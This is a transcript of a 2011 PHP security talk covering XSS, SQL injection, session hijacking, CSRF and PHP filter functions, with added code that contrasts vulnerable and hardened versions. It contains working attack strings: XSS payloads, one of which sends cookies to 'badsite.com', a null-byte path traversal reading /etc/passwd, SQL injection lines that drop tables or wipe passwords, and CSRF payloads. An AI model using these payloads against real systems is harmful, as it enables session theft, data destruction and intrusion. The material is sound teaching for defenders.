SydPHP Security in PHP
Allan Shone
Security in PHP talk for SydPHP, Thursday 24th February, 2011
1. Security and PHP
February 2011
2. Allan Shone
Technical Yahoo!, Local Paranoid @ Yahoo!7
Been at Yahoo!7 just under 3 years
allan.shone@yahoo.com
3. Website Security
4. What is Security?
- Why is Security important?
- What can you do about it?
5. Types of issues
- XSS
- SQL Injection
- Session Hijacking
- CSRF
- Phishing
6. Why XSS?
7.
- Can lead to larger problems
- Used to inject code into your site
- Bad people™ can steal user information
8. Reflected XSS through the load parameter (payloads URL-encoded):
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E
Decoded, the three payloads are an alert(0) probe, a redirect to badsite.com, and an <img> whose src sends document.cookie to badsite.com.
9.
10. The same parameter used as a file path (null-byte truncation, %00):
http://sydphp.leetbix.com/template.php?load=/etc/passwd%00
http://sydphp.leetbix.com/template.php?load=../some-config.conf%00
A null byte cuts the path short at that point, so any extension the script appends after it is dropped. PHP 5.3.4 and later reject paths containing a null byte, but the traversal itself still needs an allowlist of permitted names.
11. POST too (the same payloads arrive in form bodies, not just query strings)
12. What do I do?!
13. Filter
Simplest solution: htmlentities()
Call it with ENT_QUOTES and an explicit charset (e.g. 'UTF-8') so values inside single-quoted attributes are covered as well; before PHP 8.1 the default flags encode double quotes only.
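The template.php?load=... demo from slides 8 and 10, first in its vulnerable shape and then hardened the way slide 13 suggests, as an added example that is not code from the talk. The template directory, the allowlist of template names and the sample inputs are assumptions made for the demo; htmlspecialchars() is used rather than htmlentities() because only the five HTML metacharacters need encoding.

```php
<?php
// Added example, not code from the talk: the template.php?load=... demo of
// slides 8 and 10, first in its vulnerable shape, then hardened. The template
// directory, the allowlist and the sample inputs are assumptions.
declare(strict_types=1);

const TEMPLATE_DIR = __DIR__ . '/templates';            // assumed location
const ALLOWED_TEMPLATES = ['home', 'about', 'contact'];  // assumed names

// Vulnerable shape: the raw parameter is both echoed into HTML (reflected XSS,
// slide 8) and turned into a file path (file read, slide 10). Shown only for
// contrast; the include is left as a comment so this script stays harmless.
function renderVulnerable(string $load): string
{
    $path = TEMPLATE_DIR . '/' . $load . '.php';
    // include $path;   <- load=/etc/passwd%00 truncated the path right here
    return "<h1>Loading {$load}</h1>\n<!-- would include {$path} -->\n";
}

// Hardened: the parameter is compared against an allowlist, so only one of a
// fixed set of constant paths can ever be built, and whatever the client sent
// is entity-encoded before it is written into the page.
function renderSafe(string $load): string
{
    // ENT_QUOTES encodes both ' and " (safe inside either attribute style);
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    $shown = htmlspecialchars($load, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    if (!in_array($load, ALLOWED_TEMPLATES, true)) {
        return "<p>Unknown template: {$shown}</p>\n";
    }
    $path = TEMPLATE_DIR . '/' . $load . '.php';   // built from the allowlisted value only
    return "<h1>Loading {$shown}</h1>\n<!-- would include {$path} -->\n";
}

// Constructed inputs mirroring slides 8 and 10 (the %00 decoded to a real NUL).
$payloads = [
    '<script>alert(0);</script>',
    "<script>document.location='http://badsite.com'</script>",
    "/etc/passwd\0",
    "../some-config.conf\0",
    'about',
];
foreach ($payloads as $p) {
    echo "--- input: ", addcslashes($p, "\0..\37"), "\n";
    echo renderVulnerable($p);
    echo renderSafe($p);
}
```

The allowlist does the real work: once the file path can only be built from a constant, traversal and null bytes have nothing to act on, and the encoding step is then only about what the page displays.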
14. SQL what?
15. Arbitrary SQL code being executed
- Bypass login, edit database content
- Find passwords, hidden information
16. http://sydphp.leetbix.com/login.php
Password:
' OR 1=1 -- '
' OR 1=1; DROP TABLE users; -- '
' OR 1=1; UPDATE users SET password='' WHERE 1=1; -- '
The first payload bypasses the login on its own. The two stacked forms (a second statement after the ;) only run where the driver executes several statements per call, which the old mysql_query() does not.
17. Oh no!
18. http://xkcd.com/327/ ("Exploits of a Mom", Bobby Tables)
19. Escape
20.
- mysql_real_escape_string() (needs an open connection; the whole mysql extension is deprecated since PHP 5.5 and removed in PHP 7)
- addslashes() (not charset-aware, so not a safe SQL escape)
- PDO
- PDO::quote()
Escaping only protects quoted string literals; a value used as a number, a column name or a LIMIT is still injectable. Prepared statements with bound parameters (PDO::prepare() and execute(), or mysqli) keep data out of the query text altogether.
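The slide 16 login bypass run against a throwaway SQLite database, once with the query built by string concatenation and once with a PDO prepared statement, as an added example that is not code from the talk. It assumes the pdo_sqlite extension is available; the users table, its single row and the plaintext password are constructed for the demo.

```php
<?php
// Added example, not code from the talk: the login.php bypass from slide 16
// against an in-memory SQLite database (pdo_sqlite assumed), first with string
// concatenation, then with a prepared statement. Table and rows are constructed.
declare(strict_types=1);

function setupDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
    // Plaintext for the demo only; real code stores password_hash() output.
    $pdo->exec("INSERT INTO users (username, password) VALUES ('alice', 'correct horse')");
    return $pdo;
}

// Vulnerable: user input is pasted into the SQL text, so a quote in the
// input ends the literal and the rest is parsed as SQL.
function loginVulnerable(PDO $pdo, string $user, string $pass): bool
{
    $sql = "SELECT id FROM users WHERE username = '$user' AND password = '$pass'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row !== false;
}

// Fixed: placeholders. The driver sends the values separately from the query
// text, so a quote in the input is just a character inside a string.
function loginSafe(PDO $pdo, string $user, string $pass): bool
{
    $stmt = $pdo->prepare('SELECT id FROM users WHERE username = :u AND password = :p');
    $stmt->execute([':u' => $user, ':p' => $pass]);
    return $stmt->fetch(PDO::FETCH_ASSOC) !== false;
}

$pdo = setupDb();
$payload = "' OR 1=1 -- ";   // slide 16; the trailing space matters for MySQL's "-- " comment

var_dump(loginVulnerable($pdo, 'alice', 'wrong'));    // password really compared
var_dump(loginVulnerable($pdo, 'nobody', $payload));  // WHERE now ends in ... AND password = '' OR 1=1 -- '
var_dump(loginSafe($pdo, 'nobody', $payload));        // payload compared literally as a password
var_dump(loginSafe($pdo, 'alice', 'correct horse'));  // genuine credentials
```

The prepared version needs no escaping function at all, which is the point: there is no string to get the escaping wrong in.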
21. Session hijacking
22.
- Bad for users
- Bad for data integrity
- Easy to prevent
23. Not stand-alone (the session ID is usually stolen through another bug, such as the cookie-reading XSS on slide 8)
24. Cookies
Mark the session cookie HttpOnly so document.cookie cannot read it, and Secure so it is only sent over HTTPS (session.cookie_httponly and session.cookie_secure).
25. Integrity checking
Regenerate the session ID on login (session_regenerate_id()) and reject IDs the server never issued (session.use_strict_mode, PHP 5.5.2+), so a stolen or attacker-chosen ID stops being useful.
26. CSRF? Sugar?
27. Cross-site request forgery
28. Simple, but uncommon
29. <img src="http://othersite.com/changepasswd?new=onlyIKnow" />
<script>
a=document.createElement('img');a.src='http://badsite../';document.firstChild.appendChild(a);
a.src='http://badsite.com/otherpage';
</script>
Both forms make the victim's browser send a request, with the victim's cookies attached, to a URL the attacker chose.
30. Integrity, integrity
A request that changes state must carry a secret the attacking page cannot read: a per-session token embedded in the form and checked on the server.
31. Phishing!
32. Same, but different?
33. But what can you do?
34. PHP's filter functions
35.
- filter_has_var
- filter_id
- filter_input_array
- filter_input
- filter_list
- filter_var_array
- filter_var
36. No more superglobals
37.
$search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
echo "<h3>No results found for '{$search}'.</h3>";
echo "<a href='?search=$search&page=2'>Next page</a>";
FILTER_SANITIZE_SPECIAL_CHARS HTML-encodes ' " < > & (and control characters), so the first echo is safe. The second puts the value into a URL, and that context needs urlencode() first: filter on input, but encode for the output context.
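Slide 37's search page redone with a validating filter definition instead of a single sanitising call, and with each output encoded for its own context, as an added example that is not code from the talk. The parameter names, the filter definition and the sample request array are constructed for the demo; filter_var_array() is used in place of filter_input_array() so the script can be driven from that array rather than from $_GET.

```php
<?php
// Added example, not code from the talk: slide 37's search page with a
// validating filter definition and context-specific output encoding. The
// parameter names, filter definition and sample request are constructed.
declare(strict_types=1);

// One definition for the whole request: each key gets a filter, and anything
// missing or failing comes back as null/false (or the default) instead of
// silently passing through.
const QUERY_FILTERS = [
    'search' => [
        'filter' => FILTER_UNSAFE_RAW,      // keep the raw text; encoding happens on output
        'flags'  => FILTER_REQUIRE_SCALAR,  // search[]=... must not arrive as an array
    ],
    'page' => [
        'filter'  => FILTER_VALIDATE_INT,
        'options' => ['min_range' => 1, 'max_range' => 1000, 'default' => 1],
    ],
    'email' => [
        'filter' => FILTER_VALIDATE_EMAIL,
        'flags'  => FILTER_NULL_ON_FAILURE,
    ],
];

function renderSearch(array $query): string
{
    // Third argument true: keys absent from the request still appear (as null),
    // so the rest of the code never has to test isset().
    $q = filter_var_array($query, QUERY_FILTERS, true);

    $search = is_string($q['search']) ? $q['search'] : '';
    $page   = (int) $q['page'];

    // HTML text context: entity-encode.
    $searchHtml = htmlspecialchars($search, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    // URL context: percent-encode the query string first, then entity-encode
    // the whole attribute value (& becomes &amp; inside the href).
    $nextUrl     = '?' . http_build_query(['search' => $search, 'page' => $page + 1]);
    $nextUrlHtml = htmlspecialchars($nextUrl, ENT_QUOTES, 'UTF-8');

    $out  = "<h3>No results found for '{$searchHtml}'.</h3>\n";
    $out .= "<a href=\"{$nextUrlHtml}\">Next page</a>\n";
    if ($q['email'] !== null) {
        $out .= "<!-- alerts would go to " . htmlspecialchars($q['email'], ENT_QUOTES, 'UTF-8') . " -->\n";
    }
    return $out;
}

// Constructed request: slide 8's payload plus an attribute breakout attempt
// in the search term, an out-of-range page and an invalid e-mail address.
$request = [
    'search' => "<script>alert(0);</script>&page=99' onmouseover='x",
    'page'   => '-5',
    'email'  => 'not-an-address',
];
echo renderSearch($request);
```

Keeping the raw value and encoding at each output point is what lets one input feed both the heading and the link correctly; a value HTML-encoded on input would have to be decoded again before it could be URL-encoded.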
38.
- INPUT_GET
- INPUT_POST
- INPUT_COOKIE
- INPUT_SERVER
- INPUT_ENV
39. Twitter
Allan Shone - @cerealboy
Jared Mooring - @jadzor
Filter function filters: http://au2.php.net/manual/en/filter.filters.php